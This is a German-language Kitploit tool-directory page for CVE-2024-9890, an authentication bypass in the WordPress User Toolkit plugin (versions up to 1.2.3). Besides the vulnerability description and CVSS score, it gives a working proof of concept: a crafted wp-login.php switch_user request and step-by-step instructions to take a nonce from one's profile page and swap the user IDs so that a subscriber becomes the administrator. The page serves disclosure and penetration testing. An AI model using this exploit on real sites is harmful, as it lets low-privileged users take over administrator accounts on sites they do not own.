Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9890 — User Toolkit <= 1.2.3 - Authentifiziert (Subscriber+) Authentifizierungsumgehung | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-9890
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubrandomrobbiebf/cve-2024-9890

CVE-2024-9890

User Toolkit <= 1.2.3 - Authentifiziert (Subscriber+) Authentifizierungsumgehung

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-9890

User Toolkit <= 1.2.3 - Authentifizierungsumgehung (Abonnent+)

Beschreibung:

Das User Toolkit Plugin für WordPress ist in Versionen bis einschließlich 1.2.3 anfällig für Authentifizierungsumgehung. Dies liegt an einer fehlerhaften Berechtigungsprüfung in der 'switchUser'-Funktion. Dadurch können authentifizierte Angreifer mit Abonnenten-Berechtigungen und höher sich als jeder vorhandene Benutzer auf der Website anmelden, beispielsweise als Administrator.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-9890
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: user-toolkit

POC

root@kitploit:~
http://kubernetes.docker.internal/wp-login.php?action=switch_user&user_id=4&user_from=1&_wpnonce=8af7611329

Melden Sie sich als Ihr Benutzer an. Zeigen Sie den Quellcode Ihrer Profilseite an, um den Nonce-Wert zu extrahieren. Ändern Sie den user_from-Wert auf Ihre Benutzer-ID. Ändern Sie die user_id auf die ID des Administrators. Fertig!

Tool herunterladen